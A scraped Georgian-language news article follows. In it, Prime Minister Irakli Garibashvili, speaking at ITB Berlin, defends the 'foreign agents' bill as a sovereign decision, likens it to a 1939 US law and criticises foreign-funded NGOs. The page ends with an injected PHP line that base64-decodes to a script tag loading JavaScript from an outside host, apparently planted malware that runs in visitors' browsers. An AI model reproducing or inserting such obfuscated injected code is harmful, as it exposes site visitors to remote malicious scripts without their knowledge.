celsiusi
ავერსი საქკაბელი

საქართველოს პრემიერ-მინისტრ ირაკლი ღარიბაშვილის განცხადებით, ყველა ქვეყანის სუვერენული გადაწყვეტილებაა ის, თუ როგორი კანონი სჭირდება ქვეყანას მოცემულ დროსა და მომენტში. ამის შესახებ მთავრობის მეთაურმა ITB Berlin-ზე „აგენტების შესახებ“ კანონპროექტზე ჟურნალისტების მიერ დასმული კითხვის საპასუხოდ განაცხადა.

მან კიდევ ერთხელ აღნიშნა, რომ პარლამენტში ამ კანონპროექტის ერი ვერსიაა შესული, რომელთაგან ერთს ქართული უწოდა, მეორეს კი ამერიკული და თქვა, რომ ასეთივე კანონები სხვადასხვა ქვეყანას უკვე მიღებული აქვს.

„იცით, რომ ორი ვერსიაა შეტანილი პარლამენტში. ერთი ე.წ. ქართული ვერსია, რომელიც „ხალხის ძალამ“ მოამზადა და მეორე ე.წ. ამერიკული ვერსია, ანუ როგორც მე ამიხსნეს, რეალურად ითარგმნა ამერიკული კანონი და შემდეგ ჩვენს რეალობაში ამის გადმოტანა მოხდა. თუ არ ვცდები, ეს კანონი ამერიკაში 1939 წელს მიიღეს და მას შემდეგ მოქმედებს. ვფიქრობ, არავის გასჩენია იმის სურვილი, განეკითხა, განესაჯა, რატომ მოქმედებს ამერიკაში ასეთი კანონი. ასეთი კანონი ასევე სხვა ქვეყნებში მოქმედებს. ყველა ქვეყნის სუვერენული გადაწყვეტილებაა, როგორი კანონი სჭირდება ქვეყანას მოცემულ დროს, მოცემულ მომენტში“, - განაცხადა პრემიერმა.

ირაკლი ღარიბაშვილის თქმით, ქართული ოცნების ხელისუფლება ყველაფერს აკეთებს იმისთვის, რომ ქვეყნის სუვერენიტეტი გააძლიეროს.

„ეს არის ჩვენი მთავარი ამოცანა, ჩვენი ქვეყნის დამოუკიდებლობა. ბოლო 10 წელია, ჩვენ ქვეყანა მიგვყავს ევროინტეგრაციის გზაზე. მგონი, ყველამ კარგად ვიცით, რომ „ქართულმა ოცნებამ“ მოიტანა ასოცირების შეთანხმება, თავისუფალი ვაჭრობა, უვიზო რეჟიმი, ახლა უკვე ევროპული პერსპექტივა, რითაც საბოლოოდ დადასტურდა, რომ ჩვენ მართლაც ვიქნებით ევროპული ოჯახის, ხაზგასმით მინდა ვთქვა, სრულფასოვანი წევრი. ახლა ჩვენ ველოდებით სტატუსს.

ჩვენი ხელისუფლება ყველაფერს აკეთებს, რომ ეს სტატუსი ძალიან მალე მივიღოთ. ნებისმიერი სპეკულაცია, რაც ჩვენ მოვისმინეთ ოპოზიციის მხრიდან, საფუძველს მოკლებულია. გასაგებია, რომ შეიძლება, ბევრისთვის მიუღებელი საკითხი იყოს, მაგრამ ხელისუფლება იმიტომ ვართ, რომ რაც სჭირდება ქვეყანას, ჩვენს ხალხს, ის გავაკეთოთ. მაგალითად, ძალიან ბევრი არასამთავრობო ორგანიზაცია ვიცით, რომელიც პირდაპირ ებრძვის სახელმწიფოებრიობას, სახელმწიფოს ინტერესებს. ვიცით ბევრი ორგანიზაცია, რომელიც უცხოეთიდან მიღებული დაფინანსებით ანტისამთავრობო მიტინგებს ატარებდა, ძალიან ბევრ პროვოკაციულ ღონისძიებას, რომელიც ჩვენი ქვეყნის ეროვნულ ინტერესებს არ ემსახურება. მათი ეს დაფინანსება არ არის გამჭვირვალე. მეორე მხრივ, ისინი ჩვენ მოგვიწოდებენ, რომ მთავრობისა და პარლამენტის საქმიანობა სრულად გამჭვირვალე უნდა იყოს. ეს ასეც არის.

ჩვენ გამჭვირვალობით მართლაც ვართ მოწინავე პოზიციებზე მთელ მსოფლიოში. თუნდაც იგივე ბიუჯეტის გამჭვირვალობით ჩვენ ვართ პირველ ადგილზე მსოფლიოში. ასე რომ, ვფიქრობ, მიმდინარე კამპანია აბსოლუტურად უსაფუძვლოა. მესმის, მათთვის მტკივნეულია. წლების განმავლობაში ისინი ათეულობით მილიონობით დოლარის გრანტს იღებდნენ და ჩვენი საზოგადოების წინაშე არავითარი გამჭვირვალობა, ინფორმაცია, ანგარიშვალდებულება არ არსებობდა. გამჭვირვალობის, ანგარიშვალდებულების მინიმალური სტანდარტი ის აუცილებელი მოთხოვნაა, რომელიც ევროპულ და მსოფლიო სტანდარტს სრულად შეესაბამება“, - განაცხადა ირაკლი ღარიბაშვილმა.

მან კიდევ ერთხელ განმარტა, რომ პარლამენტში ჯერ იგეგმება ამ ორივე კანონპროექტის მხარდაჭერა პირველი მოსმენით, ამის შემდეგ კი კანონპროექტები ვენეციის კომისიაში გაიგზავნება, რის შემდეგაც ვენეციის კომისიის რეკომენდაციებს, შეფასებას დაელოდებიან და ამ საკითხის განხილვას კვლავ პარლამენტი გააგრძელებს.

251
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");